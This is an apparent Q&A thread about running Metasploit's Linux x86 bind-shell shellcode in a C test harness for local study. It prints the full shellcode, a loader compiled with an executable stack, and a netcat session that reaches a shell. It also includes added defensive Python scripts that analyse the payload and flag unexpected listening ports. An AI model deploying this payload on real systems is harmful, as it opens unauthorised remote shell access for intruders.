How do I run the linux/x86/shell_bind_tcp payload standalone?

Time: 2014-01-03 16:37:22

Tags: linux metasploit

I'm running Metasploit payloads inside a sandbox C program.

Below is a summary of the payload of interest. From there I generate some shellcode and load it into my sandbox, but when I run it the program just waits. I think this is because it's waiting for a connection to send the shell to, but I'm not sure.

How would I go about:

  1. generating the shellcode
  2. loading it into my sandbox
  3. successfully getting a /bin/sh shell <- this is the part I'm stuck on.

Basic setup:

    max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp S
    [sudo] password for max: 
    
           Name: Linux Command Shell, Bind TCP Inline
         Module: payload/linux/x86/shell_bind_tcp
       Platform: Linux
           Arch: x86
    Needs Admin: No
     Total size: 200
           Rank: Normal
    
    Provided by:
      Ramon de C Valle <rcvalle@metasploit.com>
    
    Basic options:
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LPORT  4444             yes       The listen port
    RHOST                   no        The target address
    
    Description:
      Listen for a connection and spawn a command shell
    

Generate the shellcode:

    max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C
    

Sandbox program with the shellcode:

    #include <stdio.h>
    #include <string.h>
    /*
    objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
     */
    
    /* linux/x86/shell_bind_tcp as emitted by msfpayload (78 bytes, LPORT=4444) */
    unsigned char code[] = \
    "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
    "\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
    "\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
    "\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
    "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
    "\x0b\xcd\x80";
    
    int main(void)
    {
      /* strlen() stops at the first NUL byte (offset 20, inside the
         sockaddr_in push "\x02\x00\x11\x5c"), so this prints 20 rather
         than the real size; sizeof(code) - 1 gives the true 78 bytes. */
      printf("Shellcode Length:  %d\n", (int)strlen(code));
    
      /* Cast the buffer to a function pointer and jump into it; this
         needs the data segment to be executable (-z execstack). */
      int (*ret)() = (int(*)())code;
    
      ret();
    
      return 0;
    }
    

Compile and run. This, however, is where I'm not sure how to get the /bin/sh shell:

    max@ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
    max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
    Shellcode Length:  20
    (program waiting here...waiting for a connection?)
    

EDIT:

In terminal 1 I run my shellcode program:

    max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
    Shellcode Length:  20
    

Now in terminal 2 I check for tcp listeners: -n to suppress hostname resolution, -t for tcp, -l for listeners, -p to see the program name.

I can see the shellcode program on port 4444:

    max@ubuntu-vm:~$ sudo netstat -ntlp
    Active Internet connections (only servers)
    Proto Recv-Q Send-Q Local Address     Foreign Address       State     PID/Program name      
    tcp      0    0     0.0.0.0:4444      0.0.0.0:*             LISTEN    14885/shellcode       
    max@ubuntu-vm:~$ 
    

Connecting with telnet seems to succeed, but still no sh shell.

    max@ubuntu-vm:~$ telnet 0.0.0.0 4444
    Trying 0.0.0.0...
    Connected to 0.0.0.0.
    Escape character is '^]'.
    

How do I get the sh shell?
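Before running an unknown blob in a harness like the one above, it is worth reading the facts out of it statically. The following Python script is an added example (not code from the question or from Metasploit); it takes the payload bytes exactly as printed above and explains the two things the transcript shows: why `strlen()` reports 20 for a 78-byte payload (the first NUL sits inside the `push 0x5c110002` that builds the `sockaddr_in` header), and which port the payload will listen on, recovered from that same push (AF_INET = 2 in little-endian, then the port in network byte order). The `push imm32` scan is a heuristic for this payload family, not a general disassembler.

```python
import struct

# Payload bytes copied from the msfpayload output shown in the question.
SHELLCODE = (
    b"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
    b"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
    b"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
    b"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
    b"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
    b"\x0b\xcd\x80"
)

AF_INET = 2        # sin_family value for IPv4
PUSH_IMM32 = 0x68  # x86 opcode: push imm32


def c_string_length(blob: bytes) -> int:
    """Length strlen() would report: bytes before the first NUL."""
    nul = blob.find(b"\x00")
    return len(blob) if nul < 0 else nul


def find_bind_ports(blob: bytes) -> list:
    """Listen ports encoded as 'push imm32' of a sockaddr_in header.

    The payload builds struct sockaddr_in on the stack with one push whose
    immediate is sin_family (AF_INET, little-endian) followed by sin_port
    (big-endian). Every push imm32 in the blob is checked for that shape.
    """
    ports = []
    for i in range(len(blob) - 4):
        if blob[i] != PUSH_IMM32:
            continue
        imm = blob[i + 1:i + 5]
        family = struct.unpack("<H", imm[:2])[0]
        port = struct.unpack(">H", imm[2:])[0]
        if family == AF_INET and port != 0:
            ports.append(port)
    return ports


def summarize(blob: bytes) -> dict:
    """Facts an analyst wants before executing the blob."""
    return {
        "true_length": len(blob),
        "strlen_length": c_string_length(blob),
        "contains_nul": b"\x00" in blob,
        "bind_ports": find_bind_ports(blob),
    }


if __name__ == "__main__":
    for key, value in summarize(SHELLCODE).items():
        print(f"{key}: {value}")
```

Run as-is it reports a true length of 78, a strlen length of 20, and a bind port of 4444, matching the `Total size`, the `Shellcode Length:` line and the `LPORT` setting in the transcripts. The NUL byte is harmless here because the buffer is executed in place, but it is the reason the printed length is wrong; any harness that copied the payload with `strcpy`-style functions would truncate it.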

1 answer:

Answer 0 (score: 0)

Generate the shellcode, compile and run:

    max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C
    /*
     * linux/x86/shell_bind_tcp - 78 bytes
     * http://www.metasploit.com
     * VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false, 
     * PrependSetresuid=false, PrependSetreuid=false, 
     * PrependSetuid=false, PrependSetresgid=false, 
     * PrependSetregid=false, PrependSetgid=false, 
     * PrependChrootBreak=false, AppendExit=false, 
     * InitialAutoRunScript=, AutoRunScript=
     */
    unsigned char buf[] = 
    "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
    "\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
    "\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
    "\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
    "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
    "\x0b\xcd\x80";
    max@ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
    max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
    Shellcode Length:  20

Now, in terminal 2: check the listener, then finally connect with netcat. Note that no $ prompt appears, but the shell is there:

    max@ubuntu-vm:~$ sudo netstat -ntlp 
    Active Internet connections (only servers)
    Proto Recv-Q Send-Q Local Address     Foreign Address     State       PID/Program name
    tcp        0      0 0.0.0.0:4444      0.0.0.0:*           LISTEN      3326/shellcode    
    max@ubuntu-vm:~$ nc 0.0.0.0 4444
    pwd
    /home/max/SLAE/mod2
    whoami
    max
    ls -l
    total 516
    -rwxrwxr-x 1 max max    591 Jan  2 07:06 InsertionEncoder.py
    -rwxrwxr-x 1 max max    591 Jan  2 07:03 InsertionEncoder.py~
    -rwxrwxr-x 1 max max    471 Dec 30 17:00 NOTEncoder.py
    -rwxrwxr-x 1 max max    471 Dec 30 16:57 NOTEncoder.py~
    -rwxrwxr-x 1 max max    442 Jan  2 09:58 XOREncoder.py
    -rwxrwxr-x 1 max max    442 Dec 30 08:36 XOREncoder.py~
    -rwxrwxr-x 1 max max    139 Dec 27 08:18 compile.sh
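The `netstat -ntlp` check in the answer is also the simplest way to notice a bind shell that should not be there: a process listening on all interfaces that is not a known service. The Python script below is an added example (not part of the answer) that parses that output into records and flags wildcard-bound listeners whose program name is not on an allowlist. The first three sample lines are copied from the answer; the `cupsd` line and the allowlist are constructed to show a benign listener passing the check.

```python
import re

# Sample `netstat -ntlp` output. The header and the shellcode line are
# copied from the answer; the cupsd line is constructed for contrast.
NETSTAT_OUTPUT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address     Foreign Address     State       PID/Program name
tcp        0      0 0.0.0.0:4444      0.0.0.0:*           LISTEN      3326/shellcode
tcp        0      0 127.0.0.1:631     0.0.0.0:*           LISTEN      1120/cupsd
"""

# One LISTEN row: proto, queues, local addr:port, foreign addr, state, pid/prog.
# The pid field is "-" when netstat runs without enough privilege to read it.
LISTENER_RE = re.compile(
    r"^(?P<proto>tcp6?)\s+\d+\s+\d+\s+"
    r"(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+LISTEN\s+"
    r"(?P<pid>\d+|-)/?(?P<prog>\S*)"
)

# Local addresses that mean "every interface" for IPv4 and IPv6.
WILDCARD_ADDRS = {"0.0.0.0", "::"}


def parse_listeners(text: str) -> list:
    """Turn netstat -ntlp output into dicts; header and non-LISTEN lines are skipped."""
    listeners = []
    for line in text.splitlines():
        m = LISTENER_RE.match(line)
        if not m:
            continue
        listeners.append({
            "proto": m["proto"],
            "addr": m["addr"],
            "port": int(m["port"]),
            "pid": None if m["pid"] == "-" else int(m["pid"]),
            "prog": m["prog"] or None,
        })
    return listeners


def unexpected_listeners(listeners: list, allowed_programs: set) -> list:
    """Listeners bound to all interfaces whose program is not on the allowlist."""
    return [
        entry for entry in listeners
        if entry["addr"] in WILDCARD_ADDRS and entry["prog"] not in allowed_programs
    ]


if __name__ == "__main__":
    found = parse_listeners(NETSTAT_OUTPUT)
    for entry in unexpected_listeners(found, {"cupsd", "sshd"}):
        print(f"unexpected listener: {entry['addr']}:{entry['port']} "
              f"pid={entry['pid']} prog={entry['prog']}")
```

On the sample input this reports only `0.0.0.0:4444 pid=3326 prog=shellcode`. The allowlist is keyed on the program name, which a real intruder can pick freely, so in practice the check should be combined with the executable path from `/proc/<pid>/exe` and a baseline of expected ports rather than trusted on its own.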